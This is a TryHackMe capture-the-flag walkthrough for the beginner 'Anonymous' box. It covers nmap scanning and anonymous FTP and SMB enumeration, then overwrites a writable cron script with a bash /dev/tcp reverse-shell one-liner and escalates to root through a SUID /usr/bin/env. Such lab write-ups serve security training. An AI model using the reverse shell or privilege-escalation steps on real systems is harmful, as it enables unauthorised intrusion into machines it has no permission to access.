Anonymous - TryHackMe Walkthrough

“Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.”

This is a TryHackMe box. To access this you must sign up to

URL: Anonymous

Difficulty: Medium

Author: Nameless0ne


We are given the IP Run an nmap scan with the following command:

nmap -p- -A -T4 -o portscan

Here are the open ports:

21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04 19:26 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

I will start by investigating the FTP port (21). According to our portscan, Anonymous login is allowed:

Anonymous FTP login allowed

So let’s see what is on the FTP server:


There is a directory called scripts.


Transfer all the files over to the local machine so we can inspect them.

get removed_files.log
get to_do.txt


to do


echo $tmp_files
if [ $tmp_files=0 ]
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done

This looks like a script to clear up files in /tmp.


log uses this file as a log.

Moving onto the next port, we don’t have any credentials for SSH so let’s investigate the 2 smb ports.

I used smbclient to get a list of the available shares and began to enumerate them for information. This is an “ftp-like” client to access SMB/CIFS resources on servers.

smbclient -L \\anonymous -I


Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
pics            Disk      My SMB Share Directory for Pics
IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))

The disk share “pics” looks interesting. It says it is used as a directory for “pics”.

Let’s explore this share.

smbclient //

ls samba

I transferred these over as I did with the FTP files, they are just pictures of dogs.



I transferred these over as I did with the FTP files, they are just pictures of dogs.

The only interesting file I found was the script on the ftp server. This script could potentially be a cron job which we could modify to execute our own code.

The software utility cron is a time-based job scheduler in Unix-like computer operating systems.

Since the FTP allows for anyone to log in, we can upload our own script with an identical name. So let’s start by creating our own script on our local machine.

Refer to this article for a reverse shell cheatsheet:

Reverse Shell Cheatsheet - CyberGoat

We’ll be using this one-liner:

bash -i >& /dev/tcp/[YOUR TRYHACKME IP ADDRESS]/4444 0>&1

Look at your interfaces with ifconfig, your TryHackMe IP should be on interface “tun0” on similar.

Create the file:



bash -i >& /dev/tcp/ 0>&1

Connect to the FTP server again:

cd scripts

put ftp

Now set up a netcat listener on the specified port:

nc -nvlp 4444

I almost immediately got a connection:


I am logged in as “namelessone”. The user flag is in the user’s home directory:


Privilege Escalation

Pretty straight forward so far. Just modifying the script to get a reverse shell.

sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries, I recommend reading this article:

Null Byte - Exploit SUID Binaries

And here is a very recent TryHackMe box which included the exploitation of a SUID Binary:

CyberGoat - BoilerCTF TryHackMe

To get a list of all SUID binaries, execute the following command:

find / -user root -perm -4000 -print 2>/dev/null

This returns a rather large list of binaries:


GTFOBins is an excellent website which has compiled a list of exploitable SUID binaries, use this as a reference:


One of the binaries on our system is “/usr/bin/env”. GTFOBins has a page on this binary:

GTFOBins /env

Let’s take advantage of this we can run the following from our current user shell:

/usr/bin/env /bin/sh -p


We are root, the flag is in /root/root.txt

root flag

This was a relatively easy box, I wouldn’t personally rate it medium. It is good for beginners who want to improve their enumeration and privilege escalation skills.

Written on June 9, 2020